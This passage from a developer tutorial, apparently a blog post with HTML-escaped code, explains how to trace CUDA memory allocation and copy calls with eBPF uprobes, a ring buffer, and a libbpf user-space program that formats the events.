&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The ring buffer is a crucial component for our tracer. It acts as a high-performance queue where the eBPF program can submit events, and the user-space application can retrieve them. We set a generous size of 256KB to handle bursts of events without losing data.&lt;/p&gt;

&lt;p&gt;For each CUDA operation, we implement a helper function to collect relevant data. Let's look at the &lt;code&gt;submit_malloc_event&lt;/code&gt; function as an example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kr"&gt;inline&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Fill common fields */&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Fill event-specific data */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function first reserves space in the ring buffer for our event. Then it fills in common fields like the process ID and name. For a malloc event, we store either the requested size (on function entry) or the return value (on function exit). Finally, we submit the event to the ring buffer.&lt;/p&gt;

&lt;p&gt;The actual probes are attached to CUDA functions using SEC annotations. For cudaMalloc, we have:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_malloc_enter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uretprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KRETPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_malloc_exit&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The first function is called when &lt;code&gt;cudaMalloc&lt;/code&gt; is entered, capturing the requested size. The second is called when &lt;code&gt;cudaMalloc&lt;/code&gt; returns, capturing the error code. This pattern is repeated for each CUDA function we want to trace.&lt;/p&gt;

&lt;p&gt;One interesting case is &lt;code&gt;cudaMemcpy&lt;/code&gt;, which transfers data between host and device:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_memcpy_enter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_memcpy_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we capture not just the size but also the "kind" parameter, which indicates the direction of the transfer (host-to-device, device-to-host, or device-to-device). This gives us valuable information about data movement patterns.&lt;/p&gt;

&lt;h2&gt;
  
  
  User-Space Application Details
&lt;/h2&gt;

&lt;p&gt;The user-space application (&lt;code&gt;cuda_events.c&lt;/code&gt;) is responsible for loading the eBPF program, processing events from the ring buffer, and displaying them in a user-friendly format.&lt;/p&gt;

&lt;p&gt;First, the program parses command-line arguments to configure its behavior:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;verbose&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;print_timestamp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cuda_library_path&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;include_returns&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;target_pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;print_timestamp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;include_returns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cuda_library_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure stores configuration options like whether to print timestamps or include return probes. The default values provide a sensible starting point.&lt;/p&gt;

&lt;p&gt;The program uses &lt;code&gt;libbpf&lt;/code&gt; to load and attach the eBPF program to CUDA functions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;attach_cuda_func&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;cuda_events_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;lib_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;func_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog_exit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Attach entry uprobe */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;func_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;func_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                                &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target_pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lib_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="cm"&gt;/* Error handling... */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach exit uprobe */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_exit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* Similar for return probe... */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function takes a function name (like "cudaMalloc") and the corresponding eBPF programs for entry and exit. It then attaches these programs as uprobes to the specified library.&lt;/p&gt;

&lt;p&gt;One of the most important functions is &lt;code&gt;handle_event&lt;/code&gt;, which processes events from the ring buffer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tm&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;tm&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_DETAILS_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;time_t&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Skip return probes if requested */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;include_returns&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;tm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;localtime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;strftime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s"&gt;"%H:%M:%S"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tm&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;get_event_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;print_timestamp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%-8s "&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%-16s %-7d %-20s %8s %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
           &lt;span class="n"&gt;event_type_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s"&gt;"[EXIT]"&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"[ENTER]"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function formats and displays event information, including timestamps, process details, event type, and specific parameters or return values.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;get_event_details&lt;/code&gt; function converts raw event data into human-readable form:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;get_event_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"size=%zu bytes"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
